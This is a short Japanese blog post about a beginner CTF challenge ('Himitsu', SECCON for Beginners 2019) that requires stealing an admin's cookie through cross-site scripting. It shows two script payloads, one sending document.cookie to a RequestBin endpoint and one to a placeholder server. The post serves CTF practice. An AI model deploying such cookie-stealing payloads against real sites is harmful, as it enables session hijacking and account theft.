以下の内容はhttps://thinline196.hatenablog.com/entry/2019/05/29/005951より取得しました。

【XSS】CTFでcookieを自サーバに送る問題

ctf
//

前置き

SECCON for Beginners ctf 2019で、Himitsuという問題が出題されました。とりあえず、そのWrite-upに関しては他の方のを参考にしてください。

teppay.hatenablog.com

st98.github.io


で、この問題管理人のcookieを奪うために、XSScookieを自分のサーバに送ってもらう処理を書かなければいけないのですが、あいにく自分のサーバを立てていないので壁にぶつかります。その時の解決法書きます。

RequestBin

このサイトです。

requestbin.fullcontact.com


このサイトはリクエストを受け取れる場所を生成し、その内容を見ることができます。APIを試し打ちしてみるなどの用途がありそうです。で、ここにアクセスする際にパラメータにcookieを含めるよう設定したらOKです。

<script>(new Image).src='http://requestbin.fullcontact.com/xxxxxxx?'+document.cookie</script>

あくまでHTTPのサイトなので、HTTPSからのリクエスト出せなさそう?下のスクリプトはエラーでリクエストが飛びません。 

<script>fetch('http://<my_server>/?'+document.cookie)</script>

他にも色々やり方はあると思います。が、知識不足なので例があげられませんごめんなさい。



以上の内容はhttps://thinline196.hatenablog.com/entry/2019/05/29/005951より取得しました。
このページはhttp://font.textar.tv/のウェブフォントを使用してます
不具合報告/要望等はこちらへお願いします。
モバイルやる夫Viewer Ver0.14